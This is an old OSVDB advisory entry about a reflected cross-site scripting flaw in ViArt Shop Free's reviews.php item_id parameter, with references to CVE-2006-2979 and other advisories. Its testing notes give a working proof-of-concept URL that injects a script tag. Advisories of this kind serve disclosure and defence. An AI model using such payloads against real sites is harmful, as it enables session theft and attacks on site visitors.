ViArt Shop Free reviews.php item_id Variable XSS

2006-06-07T09:49:05
ID OSVDB:26271
Type osvdb
Reporter OSVDB
Modified 2006-06-07T09:49:05

Description

Manual Testing Notes

/reviews.php?category_id=0&item_id=4&rnd=1149618267&action=1&item_id="><script>alert('XSS');</script>&category_id=0&recommended=1&rating=0&summary=1&comments=1&user_name=1

References:

Secunia Advisory ID:20538 Related OSVDB ID: 26272 Related OSVDB ID: 26270 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0063.html Mail List Post: http://attrition.org/pipermail/vim/2006-June/000846.html FrSIRT Advisory: ADV-2006-2253 CVE-2006-2979 Bugtraq ID: 18369